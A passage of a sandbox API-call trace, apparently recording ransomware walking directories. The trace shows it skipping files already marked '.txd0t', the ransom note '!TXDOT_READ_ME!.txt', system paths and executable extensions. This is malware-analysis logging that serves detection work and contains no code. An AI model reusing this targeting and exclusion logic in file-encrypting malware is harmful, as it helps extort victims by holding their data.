returned="C:\\588bce7c90097ed212\\1044\\" [0128.744] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1044\\eula.rtf.txd0t" [0128.744] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.744] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.744] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x586787e3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x137c0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.744] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.744] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.744] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1044", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044") returned="C:\\588bce7c90097ed212\\1044" [0128.744] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\") returned="C:\\588bce7c90097ed212\\1044\\" [0128.744] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.txd0t" [0128.744] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.744] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.744] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.744] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.744] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.744] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1044", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044") returned="C:\\588bce7c90097ed212\\1044" [0128.744] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\") returned="C:\\588bce7c90097ed212\\1044\\" [0128.744] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" [0128.744] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.744] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.745] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.745] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.745] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.745] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.745] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.745] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.745] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.745] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.745] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.745] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.745] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.745] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.745] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.745] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.745] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.745] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.745] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.745] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0128.745] GetProcessHeap () returned 0xe30000 [0128.745] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.745] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x588420a4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x588420a4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1045", cAlternateFileName="")) returned 1 [0128.745] StrCmpW (psz1="1045", psz2=".") returned 1 [0128.745] StrCmpW (psz1="1045", psz2="..") returned 1 [0128.745] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.745] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.745] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1045", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1045") returned="C:\\588bce7c90097ed212\\1045" [0128.745] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\windows\\system32\\") returned 0x0 [0128.745] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.745] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\windows\\system\\") returned 0x0 [0128.745] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.745] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.745] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\appdata\\local\\") returned 0x0 [0128.745] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.745] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.746] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.746] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\boot\\") returned 0x0 [0128.746] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\perflogs\\") returned 0x0 [0128.746] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\programdata\\") returned 0x0 [0128.746] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\drivers\\") returned 0x0 [0128.746] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\wsus\\") returned 0x0 [0128.746] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.746] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.746] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="crypt_detect") returned 0x0 [0128.746] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="cryptolocker") returned 0x0 [0128.746] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="ransomware") returned 0x0 [0128.746] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="C:\\WINDOWS") returned 0x0 [0128.746] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.746] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="C:\\Program Files") returned 0x0 [0128.746] GetProcessHeap () returned 0xe30000 [0128.746] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.746] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1045", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045") returned="C:\\588bce7c90097ed212\\1045" [0128.746] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\*") returned="C:\\588bce7c90097ed212\\1045\\*" [0128.746] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1045\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x588420a4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x588420a4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.746] StrCmpW (psz1=".", psz2=".") returned 0 [0128.746] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x588420a4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x588420a4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.746] StrCmpW (psz1="..", psz2=".") returned 1 [0128.746] StrCmpW (psz1="..", psz2="..") returned 0 [0128.746] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5875d2e7, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x5875d2e7, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x587835ce, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.746] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.746] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.746] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1045", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045") returned="C:\\588bce7c90097ed212\\1045" [0128.746] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\") returned="C:\\588bce7c90097ed212\\1045\\" [0128.746] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1045\\!TXDOT_READ_ME!.txt" [0128.747] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.747] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.747] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.747] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.747] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.747] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.747] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.747] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.747] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.747] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.747] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.747] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.747] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.747] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.747] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.747] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.747] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x586c4a47, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11c8, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.747] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.747] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.747] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1045", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045") returned="C:\\588bce7c90097ed212\\1045" [0128.747] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\") returned="C:\\588bce7c90097ed212\\1045\\" [0128.747] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1045\\eula.rtf.txd0t" [0128.747] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.747] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.747] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5881c229, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x143c6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.747] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.747] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.747] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1045", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045") returned="C:\\588bce7c90097ed212\\1045" [0128.747] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\") returned="C:\\588bce7c90097ed212\\1045\\" [0128.747] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.txd0t" [0128.747] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.747] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.747] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.747] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.748] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.748] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1045", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045") returned="C:\\588bce7c90097ed212\\1045" [0128.748] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\") returned="C:\\588bce7c90097ed212\\1045\\" [0128.748] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" [0128.748] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.748] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.748] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.748] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.748] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.748] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.748] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.748] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.748] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.748] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.748] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.748] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.748] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.748] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.748] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.748] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.748] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.748] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.748] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.748] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.748] GetProcessHeap () returned 0xe30000 [0128.748] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.748] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58a0bd71, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58a0bd71, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1046", cAlternateFileName="")) returned 1 [0128.748] StrCmpW (psz1="1046", psz2=".") returned 1 [0128.748] StrCmpW (psz1="1046", psz2="..") returned 1 [0128.748] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.748] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.748] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1046", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1046") returned="C:\\588bce7c90097ed212\\1046" [0128.748] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\windows\\system32\\") returned 0x0 [0128.748] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.749] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\windows\\system\\") returned 0x0 [0128.749] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.749] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.749] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\appdata\\local\\") returned 0x0 [0128.749] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.749] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.749] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.749] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\boot\\") returned 0x0 [0128.749] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\perflogs\\") returned 0x0 [0128.749] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\programdata\\") returned 0x0 [0128.749] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\drivers\\") returned 0x0 [0128.749] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\wsus\\") returned 0x0 [0128.749] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.749] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.749] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="crypt_detect") returned 0x0 [0128.749] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="cryptolocker") returned 0x0 [0128.749] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="ransomware") returned 0x0 [0128.749] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="C:\\WINDOWS") returned 0x0 [0128.749] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.749] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="C:\\Program Files") returned 0x0 [0128.749] GetProcessHeap () returned 0xe30000 [0128.749] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.749] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1046", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046") returned="C:\\588bce7c90097ed212\\1046" [0128.749] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\*") returned="C:\\588bce7c90097ed212\\1046\\*" [0128.749] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1046\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58a0bd71, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58a0bd71, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.749] StrCmpW (psz1=".", psz2=".") returned 0 [0128.749] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58a0bd71, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58a0bd71, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.749] StrCmpW (psz1="..", psz2=".") returned 1 [0128.749] StrCmpW (psz1="..", psz2="..") returned 0 [0128.749] FindNextFileW (in: 